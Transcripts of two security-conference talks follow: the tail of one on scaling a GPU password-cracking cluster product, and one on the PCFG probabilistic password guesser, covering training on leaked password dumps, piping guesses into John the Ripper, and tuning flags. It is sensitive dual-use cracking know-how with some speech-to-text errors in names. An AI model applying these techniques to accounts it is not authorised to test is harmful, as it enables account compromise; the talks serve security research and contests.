where we picked the wrong HTTP library for the API. And this basically limited the server's capability to about 12 nodes. Now, 12 nodes might seem like a lot. That's 96 GPUs. You know, that's a pretty respectable size cluster. The problem is this particular clients had ordered 320 GPUs, 40 nodes. And you can't really deliver a 40 node client to a cluster with a server that can only really handle 12 nodes. So this required not a complete rewrite, but a damn near complete rewrite time fuck, because we use that HTTP library extensively throughout the code. And there was no, like, drop in replacement. So basically anywhere where we were dealing with HTTP, we had to rip out the old library and then, you know, add in all the stuff for the new library. But they did resolve the issue. It was just really painful at the time to have to mess with that. But the server still continued to be a single point of failure and still proved to be a source of bottlenecks. As we, you know, tried to build larger and larger clusters. We kept running into problems with the server being a bottleneck and a single point of failure. And we also had clients coming to us asking us if they could order multiple cluster controllers and cluster them together, you know, either high availability or like load balance them or something. And we didn't have a solution for that, but I started thinking about a solution for that. And again, like 40% of our clients were just completely pissed that we had no GUI. So it got to the point where it's like, let's just re-think like the entire fucking thing and just like go as far away from these mistakes as we could possibly get. Like we never ever want to make any of these mistakes ever again. We've learned a lot of lessons from, you know, what we've done over the last seven years. So, but we need more than just completely ground up. We need an entire paradigm shift. Like we need to rethink this entire problem entirely and come up with something that's completely different from what's ever been done. So we need to eliminate the single point of failure at the server. We need to enable like actual infinite horizontal scaling. Because again, we're, you know, we always try to strive for like warehouse as a computer. Right. We're looking at warehouse scale computing as like the target that we're trying to hit. There should never be any, you know, limiting factors outside of budget for like how many nodes we can support in hashtag, right? And then of course, the other big requirement is we have to actually move at the pace of hash cat development. We have to, you know, as Adam commits things to hash cat, we need to have those not instantly available in hashtag, but within a very reasonable timeframe. So the very first idea we came up with was let's not do a traditional client server agent model. And that's not even try to cluster the cluster controllers. Let's just eliminate the cluster controllers entirely and make everything peer to peer where all nodes are equal. And there are no dedicated servers. And the biggest requirement to this is that work can be submitted to any node. So let's say you have like, you know, 20 users and you have, you know, 10 boxes, like there shouldn't be just one node that all of them have to hit. They could should be able to hit any node in the cluster and, you know, have the same view from any node. And it also needs to be more user friendly than ever and also needs to run on Windows. I'll tell you why in a minute. So set out to like figure out how we're going to implement this because we have that we have the high level requirements, right? Like we know it needs to be peer to peer. We know all the nodes need to be equal, you know, all that shit. How are we actually going to do this? So pretty obviously we're going to need some sort of distributed state machine, right? And that that's just straightforward and self-explanatory. But, you know, like, like, we just don't message you add in some pubs up and, you know, Bob's Uncle. But what about disagreements or, you know, maybe even more than disagreements? What about like an actual, you know, rogue cluster member, you know, or, you know, a broken, you know, cluster node that's maybe not necessarily intentionally malicious, but it certainly, you know, has, you know, the appearance of malicious behavior, right? So I started coming up with solutions for this. And I somehow got into my head, like, dude, what if computers could vote? Right? Like, you just make it to where, like, you know, if there's a dispute, then one of the nodes, like, requests to vote, right? And so they take a vote and majority wins. And if there's a tie, like we have an even number of nodes in the cluster, then like literally fucking flip a coin, you know, randomly, like, play rock, paper, scissors, like, why not? And if a peer doesn't accept the results, like then the rest of the cluster just shuns that peer. And I started thinking about, like, is this, is this actually like a thing? Like, can we actually do this? Am I like completely fucking stoned? It turns out that I really didn't have to put that much more thought into it because this already exists. Like what I thought up is actually a thing called the Raffer-Constance protocol. So it's cool that it already exists because that, you know, means we don't have to do a whole lot to implement it, but it's also cool because it kind of validated, you know, my ideas and theories on how to make this work. And told me that I wasn't just completely fucking insane. And we found several implementations of the Raffer-Constance protocol. And the one that we ended up liking the most and settled on is ACCA, which runs on the JVM that's written in Scala. Now, I hate Java. I have shun Java for damn near my entire life. You know, I completely condemn Oracle JVM. But there is open JDK. We don't have to use Oracle. And we don't have to write in Java. We can use Scala in Kotlin. And since I've started to work on this, I actually really like Kotlin. I don't really have too many negative things to say about it. It's actually kind of fun to work with. And then ACCA also has some plugins or modules that, you know, help us even further, such as ACCA persistence. What ACCA persistence does is it takes our distributed state machine, which is normally resident memory, and persists it to disk. And then ACCA distributed data, of course, would be like what implements the distributed state machine. And then on top of all of that, we built a custom multi-cast-based protocol to enable cluster nodes to automatically discover each other on the network, and then automatically join the cluster. Now, we made this opt-in because obviously that's kind of a security risk if anybody can just join the cluster. But for some scenarios like where all of your nodes are on a dedicated subnet that's properly firewalled off, and you have proper layer 3 and layer 4 access controls, this would be a solution that would be really handy. So, again, thinking about warehouse scale computing or data center as a computer, let's say you just have racks and racks and racks of compute nodes. You would just unbox one, literally throw it in the rack and power it on, and it would discover the cluster as soon as it's powered on and join the cluster and start doing work. That's kind of the vision that we have for this. And of course, since it's all peer-to-peer, that enables it to actually be just literally that simple. But of course, the default is you manually specify which peers you want to be part of this work. Okay, and then in April this year, we had the unique opportunity to present itself to purchase Loughcrack. Dildog approached me and then we entered negotiations and we purchased it early this year primarily for the GUI, which is written in C++ using QT as the windowing framework. And while it's not currently cross-platform, that's a really easy platform, or that's a really easy language and library to make cross-platform. So instead of hashtag version 3, we now have Loughcrack version 8. And while Loughcrack 7 uses John the Ripper as a back-end, we've ripped all that out and we are in the process of integrating what was hashtag version 3 as the new back-end for Loughcrack 8. And the final thing we're doing with this is we are dropping the TerraHash hardware requirement. Traditionally, we do not let people purchase a hashtag as a standalone product. We say like, you know, the only way to get hashtag is to buy a TerraHash appliance and it comes pre-installed and that's the only way to get it. But Loughcrack has always been sold standalone, so we are changing the model now to where, you know, keeping with Loughcrack being sold standalone, we're going to be selling, you know, Loughcrack 8 as a standalone product without the TerraHash hardware requirement. So yeah, that's where we are now with development. That's how the product has evolved over time and that's some of the challenges that we have faced trying to obtain our goal of true warehouse scale computing. Thank you and hope you've enjoyed this.
|
Cracking at Extreme Scale
|
10.5446/51599 (DOI)
|
So real quick about me, I have a bit of a reputation as kind of approaching this as an academic frame set, simply because I got started in the whole password cracking thing through my research when I was getting my PhD. But I really do strongly believe in learning by doing. So I'm an active member in Team John Ripper, and I do participate in password cracking contests like, you know, Crack Me If You Can, that's going on right now. Luckily, this talk is, you know, being filmed, you know, before the contest starts. So no spoilers here, unfortunately. But good luck to everyone else who's participating. So password cracking really, it's my hobby and a little bit of an obsession, but it's not my day job, unfortunately. But my day job has been very exciting recently, though, because I really focus on medical device security. And you can imagine with all the greatness around COVID-19, that has been a, it's been an interesting time. So one project that I really kind of want to highlight is the open ventilator monitoring and alerting project that I've been helping to contribute to. And there's actually a talk at the biohacking village this Sunday, and I really highly recommend people go ahead and listen to. So our team members are giving it, and it really is going to talk to you about, you know, how the lessons learned and how other people can help contribute as well. Because this has been a big problem, because as I'm sure you're aware, there's been a huge demand for ventilators to be able to help deal with COVID-19. So there's been a lot of different projects that have kind of stood up to try to help produce, you know, low-cost ventilators to help fill that need pretty quickly there. So rather than have every single do-it-yourself ventilator develop their kind of whole monitoring and alerting framework, we're trying to produce one common one that can be applied to all these different projects across the board. So because when you have these ventilators being able to treat in, you know, patients, the patients are highly infectious, so you don't want to have the nurses exposed to that. But if something goes wrong, you need, you know, seconds count, so you need to be able to forward all that sensing information that the ventilator is doing back to a centralized nursing workstation. And you need to do that securely because you're running on just a real hospital network. So that's been a really fulfilling project that I've been working on. So the other thing that I'm kind of helping out with here, as I'll move my head, is I'm helping out run the DEF CON Biohacking Village's Capture to Flag Contest. So this was originally supposed to be in Vegas. That changed, of course. So now a lot of big equipment is actually sitting in my house. So I have to be able to provide a way for hackers from all over the world to be able to log in and hack these infusion pumps here without also hacking my smart thermostat. It's part of that I actually had to repurpose one of my password cracking rigs, as you can see there, in order to run all the VMs that are helping to keep people, you know, on those ventilators and hacking those and not, you know, hacking my smart thermostat. So one, probably the first questions that should start kind of addressing here is, you know, what does that PCFG stand for in, you know, PCFG password cracking? So originally, and I guess still technically, it stands for probabilistic context-free grammar, which is the kind of the modeling framework it uses or the model of how people create passwords. So if you're into, you know, the serial autonomous or, you know, formal languages, this might actually mean something to you. But for most people, you know, they hear that and they're like, oh, God, that's like mass and stuff like that. I mean, there's no way it's going to run on my computer. And then he's kind of like slowly walk away. So I decided in order, I need to have a more descriptive name. So I went ahead and rebranded it to pre-cool fuzzy guesser. So, and this kind of explains it a little bit better about what it's actually doing underneath the hood because you trained us on a list of passwords. And then you'll go ahead and create guesses that are similar to those passwords, but different, which is really kind of important in order to help, you know, expand your cracking session. So I don't, this is my favorite slide I've ever made. So it's all downhill from here. So really kind of what it's doing is it's using machine learning in order to crack passwords. And when I say machine learning, I mean that in the traditional sense of a whole bunch of if-then statements. So it's not using neural networks or artificial intelligence, but you are training on passwords that you expect to be somewhat similar to the target passwords that you're cracking. And when it processes that training password set, it extracts all sorts of probability information about the components of those passwords that it finds there. So it figures out things like, you know, capitalization masks, whether numbers go at the beginning of the password versus the end, the probability of individual letters and numbers found in that password, keyboard walks, and so on. And so it goes ahead and creates a model based upon all those different types of probability information there, and then it uses those in order to generate very highly probable password guesses in probability order. So it'll start with the most probable password guess and go to the second most probable password guess and then go to the third one and so on until you crack the password that you're trying to find or you give up. So let me just move my signal here a little bit here. So just to kind of tie us back into probably what's going on right now, as I said, I don't know what the actual contest is going to be like for it to crack me if you can. But CoreLogic, healthily provided a brief summary of what does the center, it's going to be at least here. And so we're going to be targeting 12 different individuals, and those individuals change their passwords over time in order to be able to deal with more complex password creation requirements. And that sounds a little bit like something that PCFG might actually be useful for, so I'm really optimistic for this contest. You'll see how optimistic I am on Saturday when I'm actually, you know, we're giving this talk. But, you know, this is kind of the scenario that this was originally developed for in the first place. You know how a subject creates passwords, so you want to create passwords kind of similar to that, but you also want to go ahead and change them and maybe, for example, you use more complex rules or complex password creation work requirements added on top of that there. So I'm available probably on Discord right now, and so I'll be able to answer questions about how potentially you might be able to tweak this in order to help in a scenario like this here. The fact that there's a lot of academic papers about this, though, is when I give a talk like this, I don't actually have to create any of my own graphs. I just can go to other papers there, you know, look at the research that other people have done, and just pull out their graphs in order to be able to talk with it here. So one thing that I really kind of want to highlight, though, and you need to kind of look at this with a bit of a skeptical eye, is that you'll notice that all these cracking sessions are really, you know, short. I know, you know, one trillion guesses here, that might sound like a lot, but we start talking about, you know, GPU password cracking. You're talking about, like, under a second in order to generate all those. So that's just, you know, no time whatsoever. And part of the reason for this here is that the PCFG approach is very slow. It doesn't, you know, scale very well with multithreading currently. So when you start talking about the passwords that you want to be able to crack, it works very well when you're going ahead targeting very slow password hashes, where you can only make, you know, thousands of guesses a second because the hash is very slow. But we start talking about things like, you know, unsalted MD5, other attacks that are going to be much more effective because you can just make so many more guesses in the same time frame there. So when you start looking at, you know, faster password hashes, you can certainly go ahead and still use a PCFG to supplement your attack. And you can still go ahead and crack some passwords that you might not normally get. But in general, for the faster password hashes, you really are going to want to go ahead and use more traditional types of passive cracking attacks in order to really make use of the hardware that you have available to you. So I want to talk about this graph, kind of, though, and really focus on it, because this was a really neat study done by Carnegie Mellon University. And one of the problems when you look at the academic research, especially when you start talking about offensive tactics, is that the academics are, you know, running attacks themselves. So you're looking at, you know, how effective students are at cracking passwords versus someone professional, potentially. So CMU, you know, took the probably the most straightforward approach to be able to solve that problem was they went out and reached out to CoreLogic. You might have heard of them, they're running this, you know, password village, they run the Crack Me If You Can competition. So when you're trying to find an expert, you know, they're like, you know, way up there. So they're a pretty good representation for that there. So what they did was they gave one of the CoreLogic engineers a password list. They asked them to crack it, and they recorded, you know, how many passwords they cracked over time, it was the number of guesses they made, and then they compared it against other cracking sessions as well. And, you know, one thing I'm really, you know, it makes me smile every time I see this here is that the PCFG did really well compared to the pros, which was CoreLogic, for that short cracking session. So when you start asking, like, you know, can this represent, you know, how a real professional password cracker operates, the short answer is it certainly, you know, appears to be able to be able to do that there. So, you know, full disclaimer, when you give, you know, CoreLogic had more time, they definitely performed way better. This is a logarithmic graph, so that's about 100 times more guesses. And also, I'll admit this wasn't fair to CoreLogic either, because, you know, that's not typically how, you know, people crack passwords in real life there. It was such a short, you know, cracking session. And when it is that short, usually it's against a really strong password hash, and you have a lot of time in order to really mainly tweak your attack that you're running there. That being said, if any of you are listening, I would love to have a repeat or a rematch of this, you know, attack just to see, you know, how this performs with all the new improvements that have been made into PCFGs. And I'm sure that CoreLogic has really been upping their game over the years as well. So that's why I'm somewhat hopeful that we'll be able to find it, you know, useful in the contest that's going on right now. So, enough about, you know, all the research side of that there. Let's talk about how to actually make use of this PCFG password cracker. So the first thing is you just go ahead and download it from the GitHub repo. And the requirements of it, I really have strived to make it as simple as possible. So you need to have Python 3, and that's it. So there's an optional care debt Python module that can help during the training. And that's because it helps detect what the character encoding the training set is because character encoding is a bane of my password cracking existence. But even that's optional, and actually it's now being installed as part of PIP 3. So if you have PIP, you probably don't need to install it yourself as well. And this is really useful though because I find a lot of situations where like when I'm cracking passwords, like I don't have internet access. So it's really nice to be able to go ahead and quickly just throw my tool on a box and get it to run. So if you can run Python 3 on a box, you can probably run this here. So I've tried it on a bunch of different OSes. I've actually even gotten it to run on NetBSD, and it was just the only thing I've ever gotten that it'd be able to run on NetBSD. So hopefully this is easier than your typical academic tool set in order to get it installed and start cracking passwords with it quickly as you can. So we start talking about hardware requirements because that's always an important portion when you start talking about the password cracking. The PCFG tool set, it is single threaded CPU bound, which is why it's so awfully slow. But it will use an entire CPU thread. So you do really need to dedicate one full CPU thread to the PCFG. The other thing is it has very high RAM usage. It basically maintains a lot of different data structures and memory, and those data structures become more complex over time, so it just grows. So I could have done some things, tried to go and prune that or move some of it to disk, but RAM is cheap, so I haven't. So it'll just keep on growing over time. So initially it starts separating low usage, but if you're talking about running this password cracking session for like a week or two, you really need to have at least 16 gigabits of RAM to really kind of just fully dedicate to the PCFG tool set itself. So the next step is to actually make use of it and run it. So I apologize up front that I tend to use the words ruleset and grammar interchangeably, and at least to me they mean the exact same thing. But really what I'm talking about is that, you know, I mentioned machine learning a couple of times here. You have to go ahead and train a grammar on an existing password data set. Now you may want to have, you know, different grammars for different targets that you're trying to target. So if you're trying to target, you know, a web application carrying to younger people, you might want to train it on passwords that resemble that. If you're trying to target, you know, corporate passwords, you might want to train on corporate passwords instead, and use those rulesets against target passwords that you're specifically, you know, think will match that. So you can have as many rulesets as you want to be able to really kind of fine tune your cracking session there. So the default one rule set that comes with the PCFT password cracker was actually trained on a subset of 1 million passwords from the Rocky data set, which came out in 2008. And it was against web passwords, so there wasn't really any strong password requirement whatsoever. I've been thinking about updating that. So if you have a good data set that you think that I should use for that there, I'm hoping to hear in about that there to make it a little bit more effective. But that being said, the Rocky data set is still extremely effective even to this day. It's just, you know, Blink 1A2 is not nearly as popular. So after you have used the data set that you want to use though, now you go ahead and start generating guesses. So it's a Python program. So you just go into Python 3. You run the PCFT guesser.py tool from the repo. You give it the name of the rule set by default default. So if you don't go ahead and specify that there, it'll go ahead and use the Rocky data set. And then you go ahead and specify session name as well. By default, this is default as well. And so the session is used to restart a password cracking session. So if you have to cancel it for whatever reason, you can go ahead and restart it back up again. So I really want to kind of highlight though that the PCFT tool set is only a password guest generator tool set. It will generate password guesses. It will generate those password guesses in probability order. So it'll start with the most probable password guess, second most probable password guess, and keep on going down the line. It will not actually hash and crack any passwords. So you need to use another password cracking tool set for that there. You know, both John Ripper and Hashcat work are basically any other password cracking tool that accepts, you know, guesses in from, you know, the standard input there. As I mentioned earlier, I'm on team John Ripper. So I'm going to go ahead and use John Ripper for pretty much all of my examples here, but you can totally use Hashcat as well. So in order to do this here, you run the previous command that I talked about. And then you run, you know, pipe it into, for example, John. And on John, they have, you know, a command called standard in, so that you type that in there. And instead of running data from like a word list, or generate your password guesses, it'll go ahead and use the password guesses that are piped into. And you're cracking passwords. That's really all there is to it. So there's definitely optimizations for actually using this in the real world, though. So the first thing I really kind of want to highlight is a lot of times you want to know what the status of a cracking session is. So the challenge when you are using the pipe command, though, is if you go ahead and hit the enter button on your keyboard, instead of sending the enter button to John Ripper, it's going to go ahead and forward that to my tool instead. So you might want to be able to, you know, get John Ripper to output a status report. So the way that you do that is you send a sig user one signal to John Ripper. If you're writing this on a Linux system here, you just type in kill dash sig user one, and then the process on Netfire or John Ripper. And when you do that, you hit enter, it'll be just like hitting enter on the John Ripper itself, and it'll go ahead and output the status output of its current cracking session. So now you can do things like, okay, not only see the passwords are getting cracked, but you can see like the number of hashes, the total number of hashes are cracked so far. You can see, like, for example, the guessing speed. So in this case, it's making about 4 million guesses a second. And then you can see, like, how long it's been running and, you know, all the other, you know, options as well. So I want to kind of dig into that one, you know, output of that cracking session, though, because I think, you know, this really kind of helps demonstrate kind of some of the power of using the PCFG. Because normally when you're just here showing the passwords as they get cracked. So you can kind of see that it's not just going ahead and, you know, figuring out one rule and then exhausting that rule, then going to the next rule, like you would see in the more traditional password cracking session. Instead, it's creating much more fine-grained rules and interdating between all those depending on what the current probability of it is here. So when you see these passwords being cracked, it's kind of fun to try to figure out, like, how did the underlying system, you know, generate that password guess? Why is it making the guess right now that it is? So kind of, if you look at, you know, initially here, like, this is pretty easy, okay, it's just taking some five-letter words. I apologize, my microphone just died here. So funds are doing, you know, Defcon remote. So, you know, it's using five-digits, you know, five-letter words plus four digits here. Moving on, though, this is kind of an interesting one here, is SESS is cool. So I looked into my input dictionary and SESS is cool was not in my input dictionary or my train said at all. And I found out that it was actually you doing multi-words for this here. So it was combining, you know, SESS and then it's cool. So one kind of cool thing about this, and I'll talk to you about this a little bit later, is that instead of, you know, going ahead and breaking this up into three words, like we normally would think about it there, it actually broke it up into two different words, so SESS is cool. So that way you can go ahead and go through it and say, like, okay, is, you know, Katie cool, is, you know, Allie cool, is, you know, Bob cool. Because there's a lot of cool people out there. So it can go ahead and iterate through those there and try that type of, you know, a mangling rule for it there. And what's really cool about this is that it learned that is cool is a common word from the train itself. So I didn't actually ever program in that logic into it. It learned it by itself by looking at the training data, which is, as I said, pretty cool. But you can see after that there, it kind of went into brute force. It wasn't the pure brute force. And I'll talk about the different types of brute force here is actually combined with some very short words, kind of like a combinator attack. But still, you know, you'd see able to kind of get that out that way. And then it went ahead and tried, you know, words with, you know, special characters, the same special characters at the beginning and the end of them too. And that's, you might be able to see that in a traditional passive cracking session, but you actually have to have a rule in order to generate that. And trying to create those rules is a real pain. So you won't see those in, you know, most, you know, commonly publicly available rule sets, but it was able to learn that from the training data, which is, I thought, pretty cool as well. So down here, and I'm kind of, you know, need to get off the screen here, but you can see it's trying some longer words. But these are actually, while they're normal words here, they actually generate them via the multi-words as well. So like finger plus nail or 90 plus nine. And once again, this is kind of really useful because now you don't have to have things like 99, 98, 93, you know, in your data set, your word list as well, because it's generating those on the fly. Kind of going down a little bit further here. This is your more traditional kind of rule here. It's just two digits plus capitalizing the first line of a word. So you can see it's starting to do that. But, you know, settings is a pretty uncommon password word to be able to use. So it's trying it later in a cracking session here. And now it's even combining even more mangle rules. So it's trying, doing a multi-word, you know, of wood plus fish and, you know, terra plus dawn, and adding digits to the end of that as well. So you can see how it starts stacking these different rules together. And I kind of want to highlight that this cracking session has been going on, as you can kind of see from the status output, for about 13 minutes. So all the really easy passwords have already been cracked. It's already guessed, you know, one, two, three, four, five, six and password one, two, three, four, five and so on. So these are starting to get into more of the, you know, the fuzzier of the rule set. So you might not normally see in a normal password cracking session. So as I mentioned a little bit earlier, if you hit the enter button, it's going to go to my program, not, you know, John the Ripper. But there's a lot of information that I want to be able to provide to people about the status of your cracking session. So whenever you hit enter, or basically Andy's Archie's here, it'll display an output of what it's currently doing. So you can try to figure out, you know, whether you want to continue it, whether it's working correctly, and whether it's kind of doing what you want it to do as well. So kind of going through this here, I hit enter twice, and so you can kind of see how it's generating, you know, these password guesses as doing it here. So the first one, you know, it's, you know, basically going ahead and trying to combine two words. So it's a multi-word type of attack. And you can, if you dig into like the real details of it there, you can kind of see that it's trying like the 140-served, most probable word with no capitalization. And it's combining it to the 93rd most probable four-letter word with no capitalization as well. So you can see that the probability assigns to like even individual words and so on, that is very, very fine grained. So it's going to try some words and then like do other mangling rules and stuff like that. And it'll go back to the less probable words later on in the cracking session. So now this next one here, it's kind of a little bit, I'll try to get out of the way or something like that. You can see that it switched to a real brute force attack using Omen, ordered markoff enumerators. And I'll talk about that a little bit later there. But really I kind of want to highlight though that it's trying, you know, more traditional cracking rules. So it's like, you know, like, you know, combining words and then it's switching to brute force and they'll switch to another mangling rule after this here. And then it'll just keep on going to the base point, whatever the current probability is. Now, as I said, I really struggle with documenting my code. So I try to go ahead and add as much documentation into the runtime behavior of it as possible. So if you instead of hitting, you know, enter or anything else along those lines, you hit H and hit enter, it'll provide, or just H actually, it'll provide a SAS report output of what all these different fields here mean. And that SAS report actually is much longer than even displayed on the screen here. But it explains what all those different like letters like A5 or C5 actually stand for. The one thing that I kind of really want to highlight though is this one metric here called probability coverage. Because since the PCFG password crack creates guesses in probability order, it starts with the very high probable passwords and it goes to less probable passwords and less probable passwords. And the model that it has will basically never finish. It'll just keep on figuring new combinations of words to go through to it. So a real challenge becomes, you know, when do you go ahead and give up on a cracking session? So you haven't cracked the password. When should you go ahead and, you know, kill this off and try some other cracking type of attack that might be more successful? Or when do you go ahead and just choose to say, I'm not going to crack this password and move to a different case? So this probability coverage is a very fuzzy metric that I tried to develop to try to just give you a little bit of kind of a rule of thumb about when that should be. So what this metric says is that if the target password is the same probability distribution as the password that I trained, and if my grammar and how the model, how the password was created was exactly correct, this is the probability that we cracked this password. Now, these are one of those assumptions that is actually true in real life. The probability model that the password is trying to crack is probably very different. The grammar that I generate and train on is absolutely not perfect. But at least, as I said, it kind of gives you a rule of thumb to say, okay, this is starting to get a little bit high. It says, you know, I had like a 90% chance of cracking this password. I haven't cracked this password yet. Maybe I should go ahead and give up. And you'll notice this number jumps up really high initially because it's making high probability password guesses. And then it slows through a crawl to almost like no advancing after you get through, you know, like 70 or 80, 90% completion there. So this is kind of really good to be able to figure out, you know, where can I go ahead and devote that, you know, that one single CPU in that RAM somewhere else there. So another usage tip I just kind of want to highlight is that sometimes the cracking dynamic when it comes to speed is completely reversed. So you might be trying to crack very, very computationally password hashes, expensive password hashes, or a lot of like, let's say, assaulted hashes, in which case you're really only making a couple guesses a second. Well, this generator is generating, you know, let's say, you know, between like, you know, 100,000 and like 4 million guesses a second. So it gets backlogged and basically essentially freezes while it waits for it to be able to send more guesses to the passive cracking program. So occasionally, if you hit enter, it won't actually display the status or it'll take a while to display the status. And that's kind of usually what's happening. So if that's happening, and you're kind of curious whether the passive cracking sessions crashed or not, I recommend going back to earlier advice about sending a signal to, let's say, John Ripper, and just seeing how that's doing there in order to make sure that your passive cracking session is still running. So as I talked about, you know, multi-word feature is probably been the biggest, you know, addition to the new 4.0 rewrite. And it has completely shocked me how effective this has been here. So I won't talk too much details about it. But the one thing I want to really kind of stress though is that it is not language specific at all. It learns all what constitutes a word from the training set that you're giving it there. So it'll pick up things like new band names or proper nouns that are really hard to specify inside the language dictionary or whatever new Pokemon just came out. It identifies patterns like, you know, I love and stuff like that. So this is very useful for being able to, you know, try to target new, you know, password hashes. So as I said, it's not language specific. It works best with, I would say, kind of like European English type languages. It really struggles still with some of the other languages like Mandarin. But that is something absolutely that I really want to focus on more going forward here. It's not perfect. It's definitely a work in progress. So there is a balance between, you know, creating, you know, false positives of the matches here. If you don't see some of the base words in the train set by themselves, they won't identify them. But it's something that is evolving and part of the new pull request from the, I just received from somebody else actually has some improvements to this here that I'm really excited about, again, pushing to main. So one of the other big features that have been added recently here is order Markov enumerator. So, and the whole reason why I talked about this is that a similar can be approached can be taken for pretty much anything for, so if someone creates a better cracking attack or cracking mode, it can totally be incorporated into a PCFG style attack. I'll be a little bit like the Borgenet response or respect. But the real challenge is to be able to figure out how to assign a probability to a password guest. So if you can assign a probability to a password guest, I can probably incorporate it into a PCFG. So just kind of in the last little bit here, I really kind of want to highlight some, you know, additional tricks that are very useful when it comes to cracking passwords. So the first one here is a skip root flag in the PCFG. And basically what this does is disable Omen guest generation. And that's not to say that, you know, Omen guest generation is something that's bad to do. It certainly definitely helps increase the success of a password cracking session. But you can, this is the way to paralyze your attack. So if you're having another system that's going ahead and really cracking through your brute force attack, you might want to go ahead and, you know, do all your brute force on that other system or run it other thread and then run the PCFG guest are really just to focus on the word mangle rules instead. So in order to do that, all you need to do is just when you run it, just type in skip root. Another flag that's really kind of useful is the all lower flag. And what this means is it'll stop doing any sort of case mangle on the password guest. So let me try to move my picture just a little bit here just to make it easier to read as I go back. I apologize. Okay. So a lot of times you may want to not go ahead and do case mangle inside of PCFG itself. And one reason might be that the hash that you're targeting is case insensitive like landman. That's not probably the best example though because if you're cracking landman hashes, you're not using PCFG in order to do that there. You're just going ahead and brute forcing that sucker and taking it out that way. Whereas more likely though is that case mangle is very distinct for how people do it there. So if someone does a certain type of case mangle, they have a tendency to keep on using that strategy for all their other passwords. So when you start doing things like targeting the password cracking, you may not want to go ahead and just go ahead and do what everyone does. You want to really make a specific case mangle for that particular individual. In that case, the better way to do this is that John Ripper supports a really powerful feature called pipe. So what the pipe does is instead of just going ahead and taking the guesses in from standard input and writing them as is, you can apply additional rules on top of that like you would do in a traditional password cracking dictionary type of attack. So you can specify your very specific case mangling rules inside John Ripper's rule set and then pipe the lower case password guesses right into John Ripper and have John Ripper capitalize it itself. And that can be very powerful when you have an idea what type of case mangling you want to be able to target. So I, of course, moved it to the wrong portion here. Let me move my screen again here. I apologize. Some coming improvements, as I mentioned, there was an amazing pull request that was submitted to me with a bunch of new features. I'm slowly incorporating them into the core, but I actually have the features available as their own kind of tool called segmenter.py. And by that, I mean, and I apologize if I made a pronouncing name because I've only seen it written, but Chun-Wan Wang submitted this here and it really impresses me there. So probably the biggest feature I'm really excited about is leap speak replacement. This has been a feature that has been kind of my way as far as implementing and it's just the airscrew time we've gone through it. It's just not been very effective. But that's currently incorporated into this tool called segmenter.py that's been called included in repo that we'll go ahead and try to parse that information out. I'm looking at getting that incorporated into my core trainer and getting that incorporated into password crack concessions in order to be able to really target that there. He also improved some of the multi-word detection, so he made that better. And then he also has incorporated some new approaches into the password score, which is a different tool that you can go ahead and submit your password into the password score. And they'll tell you what the probability of your password is, which is kind of nice as well. So all credit goes to him for these really impressive impresses here. And if anyone else is looking at helping out too, I'm all about that. So thank you very much once again for that there. Okay, so let me move my screen around again here. Okay, so the next thing I want to talk about here is the compile PCFG guesser. So I've been talking about the Python tools that are all around along right now. So the compile PCFG guesser is a completely different fork and can get the name there. It's written in Python, it's written in compile C code. It's a little bit harder to get actually installed and running simply because when you start talking about compiling your code, it runs a great mic machine, but it has challenges elsewhere. So I tried to go ahead and use the hash cat build make file for this. So if you can build hash cat on a computer, you have at least a better chance of being able to go ahead and get this running as well. But if you have problems, please reach out to me on the GitHub site and I can try to help you fix those there. So I will say that the trainer portion will always be written in Python. I just like writing in Python too much to change that over. So basically you'll go ahead and create the train rule sets with the Python trainer, but then copy them over to be used in the compiled version here. Also, the compiled version has a tendency to see the lag in features from the Python tool set because once again, I like writing in Python. I'm not the best C coder in the world. So basically if I write a hello world program, it's going to have like five buffer or flows and you know, a segfault. So that's what you will there, but I'm making this available. If someone wants to write a better one, I'm totally open to that as well. But you know, it doesn't have saver store. It doesn't have stats outputs and it has no home and guest generation. So all that being said, you know, why bother was this here? And really at the end of the day, the main reason is it's about 20 times faster than the Python tool set. And I've always heard that, you know, C code is faster than the Python. But when I saw that, I was like, holy crap. So I will be upfront. I'm actually even with all these limitations when I'm cracking passwords. I'm using the compiled C version now much, much more often than I'm using the Python one there. So because that 20 speed improvement is a hard to beat for most password cracking sessions. So now I'm going to talk real quick about training passwords. So I've been talking about this a lot here. And there's a lot of different reasons why you want to go ahead and create a new password training set there. So language is a huge one. So you want to be able to train a password that are similar to the target that you're trying to target. And another big one is that corporate passwords are very, very different than you'll see from websites. And I'm sure you've probably heard CoreLogic talk about this before, you know, yesterday. But that's something that, you know, is very evident. So if you're trying to target corporate passwords, you probably do want to go ahead and train on corporate passwords versus going ahead and training on passwords for some gaming website. So another reason to go ahead and train it though is if you're targeting a specific password creation policy, or you know which mangle rules your target prefers. So one way to be able to really target that there is to train only on passwords that match that training set there. And there's other things you can do, like the password rules or the grammar that I generate. I made sure that I didn't include anything like a CRC check or any of those handy checks into it there. So you can actually open up the files themselves or just text files and start editing the probabilities of different things in them by hand too. So if you say like, oh, this is one word I really want to go ahead and make it like highly probable. But I don't want to go ahead and train on a whole new train set. You can just go ahead and open it up, put that word in there, give it whatever probability you want. And that will just be read in and used in your password cracking session there. So the other reason that train on a password train set there is it generates a bunch of information, it extracts a lot of information from that password set. So it's really useful to be able to analyze a new dump that you have accessible to you there. So for example, it will pull out like common emails, it will pull out dates and websites, and try to help you figure out where did this password data set come from there. So the next question of course is where do you go ahead and get these password data sets from? So there's a lot of challenges with this too because a lot of data sets are not optimal when it comes to training on. So I don't know if you know of hashes.org but it's a really great site for being able to download all these dumps as they come out here. So for example, let's say you want to go ahead and train on this data set here. I'm not going to try to pronounce any of that site because I'm sure I'll just horribly, horribly mangle it there. But when I did some googling about this site here, it was a site for new college students trying to find a job in China. So that's kind of an interesting data set there that you might want to be able to use in order to track passwords here. So if you download something from hashes.org, the first most important thing is like the plain text option to train your rule set on because you don't want to include the hash part of your training set because it will think it's part of the password and it goes poorly there. So one other thing I really kind of want to highlight here, and this is a feature that I'm hopeful to be able to get added to the PCFG tool set. But I was informed by the owner of the site here that they actually do some additional things for encoding non-UTF-8 characters. So my trainer will not fully parse correctly. So that's something I need to add in too so that it goes ahead and uses the correct character encoding for non-English passwords. So I just want to put that warning out too for trying to train us on things like Mandarin. But one problem with a lot of these dumps here is the first one is they don't contain duplicate guesses. So duplicate guesses are really important when it comes to trying to figure out what the probability of password is because if you don't have duplicate guesses, one, two, three, four, five, six looks like a very random string. So that's useful, but I will say when you run longer cracking sessions with PCFGs, that lack of duplicates becomes less and less important because you've already exhausted all the really problem password guesses. The one issue though is that the Omen portion really does struggle without the duplicates. So you might not want to go ahead and enable Omen guessing if you train on a dataset that doesn't contain any duplicate guesses there. The other problem with these dumps is that they only contain the passwords that have been cracked. So basically you don't know or learn 